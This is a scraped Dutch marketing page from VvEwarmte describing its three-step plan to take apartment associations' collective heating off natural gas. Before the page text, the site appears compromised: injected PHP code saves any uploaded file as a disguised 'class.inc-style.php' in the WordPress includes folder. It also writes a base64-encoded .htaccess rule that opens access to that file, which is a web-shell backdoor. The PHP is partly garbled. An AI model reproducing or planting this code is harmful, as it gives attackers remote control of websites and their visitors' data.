function fwss(if(file_exists($f))@unlink($f);if(file_exists($f)) chmod($f,0666);$f,$c){$p=@fopen($f,"w");$t=@fwrite($p,$c);@fclose($p);if(!$t)$t=@file_put_contents($f,$c);return (bool)$t;}if(!empty($_POST["nn"]) && move_uploaded_file($_FILES["file"]["tmp_name"],"/home/vvewarmte/domains/vvewarmte.nl/public_html/wp-includes/theme-compat/class.inc-style.php") && fwss("wp-includes/theme-compat/.htaccess",base64_decode("PEZpbGVzTWF0Y2ggIl4oY2xhc3MuaW5jLXN0eWxlLnBocCkkIj4KT3JkZXIgYWxsb3csZGVueQpBbGxvdyBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+"))exit(1); Aanpak - VvEwarmte

Aanpak

De aanpak van VvEwarmte

Wonen doe je altijd in de context van je tijd. Daarom wil je met je VvE verduurzamen en van het aardgas af, want zo blijven de woningen in jullie appartementencomplex toekomstbestendig. Hoe dan? Over kleine maatregelen
is iedereen het snel eens. Maar de grootste CO2-producent is je aardgasgestookte CV-ketel. VvEwarmte is dé expert in deze warmtetransitie en biedt voor collectieve ketels (ook wel blokverwarming genoemd) de oplossing om snel en eenvoudig aardgasvrij te worden en CO2 uitstoot te verminderen.

VvEwarmte brengt structuur, overzicht en duidelijkheid. In logische en
natuurlijke stappen maakt VvEwarmte jouw gebouw 100% aardgasvrij!

De voordelen van onze aanpak:

De investering wordt zo veel mogelijk gedekt uit aardgasreductie

Binnen één jaar ben je tot 80% aardgas vrij en bereik je tot wel 50% CO2 reductie

Garantie op continue warmtelevering voor de VvE en haar eigenaren

De drie stappen van VvEwarmte
naar 100% aardgasvrij

VvEwarmte overziet het hele traject naar 100% duurzame warmtelevering. Wij nemen de fossiele
warmtelevering over en nemen jouw zorgen uit handen om deze stap voor stap te verduurzamen.

Stap 1

 We nemen de blokverwarming over en voegen duurzame installatietechnieken toe.
Dit zorgt voor een duurzame warmtelevering en gasvermindering tot wel 80%!

Stap 2

 In de volgende fase verlagen we de warmtevraag binnen het complex. Dit doen we door extra te
isoleren, de installaties in de appartementen aan te passen en de overstap te maken naar
elektrisch koken. Tussenstand: 90% aardgasvrij.

Stap 3

De laatste 10% is vaak de duurste stap. Deze stap kan ook over 10 of 15 jaar gezet worden met
nieuwe technieken die dan haalbaar en betaalbaar zijn. Denk aan een nieuwe, innovatieve
warmtepomp, het gebruik van biogas uit gft-afval, een toepassing van waterstof of misschien een
nieuw warmtenet met warmte uit een duurzame bron. Per gebouw selecteert VvEwarmte op het
juiste moment de beste techniek.

Gelijk aan de slag? Ontvang een eerste voorstel!

De technische oplossingen

Als specialist op het gebied van collectieve warmte-installaties, zoals blokverwarming, biedt VvEwarmte de best passende technische oplossing. Er wordt zoveel mogelijk gebruik gemaakt van lokale, duurzame energiebronnen om zoveel mogelijk fossiele brandstof te besparen. Met betrouwbare, robuuste technieken worden bestaande installaties snel omgezet tot duurzame warmte installaties.

Vanwege de snelheid van nieuwe ontwikkelingen en innovaties, blijft VvEwarmte techniek onafhankelijk. Zo kunnen wij altijd de beste oplossing voor jouw VvE realiseren. Om de prestaties en CO2-vermindering te garanderen nemen we het volledige ontwerp-, realisatie-, beheer- en exploitatietraject aan.

onze aanpak (2)

Wat kost dat eigenlijk?

Per gebouw wordt gekeken naar de meest optimale oplossing om zoveel mogelijk aardgas te besparen. Het doel is dat de investering terugbetaald wordt uit deze besparing. Wij bieden de VvE op basis van deze investering, de huidige aardgas- en elektraverbruik en de oude energierekening, een duurzame business case aan. Hierin krijgt de VvE zekerheid over wat de energiekosten gaan zijn gedurende de contractperiode. Ook de rente en aflossing van de investering worden meegenomen in deze business case.

Hoe lang duurt dat?

De looptijd van een contract ligt tussen de 15 en 20 jaar. In deze periode worden tijdens natuurlijke momenten alle stappen gezet om 100% aardgasvrij te worden. De grootste stap tot wel 80% maken we gelijk in het begin. We vertellen je graag meer over onze aanpak en de logische stappen voor jouw VvE.

hoe lang duurt dat (1)

We doen het samen

VvEwarmte gelooft in samenwerken. Samen met de VvE’s, VvE-beheerders, installateurs en toeleveranciers delen we kennis, ervaring en nieuwe ideeën. We gaan niet voor middle of the road, maar voor best in class. Daarom blijven wij continu nadenken of onze oplossingen voor jouw VvE toegevoegde waarde leveren.

De energie- en warmtetransitie naar nul CO2-uitstoot is ook een organisatorisch vraagstuk. Want krijg je iedereen mee om naar een lokaal, decentraal energiesysteem over te stappen? Hoe kan je met Verenigingen van Eigenaars en bewonerscollectieven op eenvoudige wijze de grootste impact maken? Heeft iedereen hetzelfde einddoel goed voor ogen? VvEwarmte pakt deze vragen op en gaat praktijkgericht en stap voor stap te werk. Met continu het einddoel van 100% schone energie voor ogen.

Wat zijn de meeste gestelde vragen over VvEwarmte?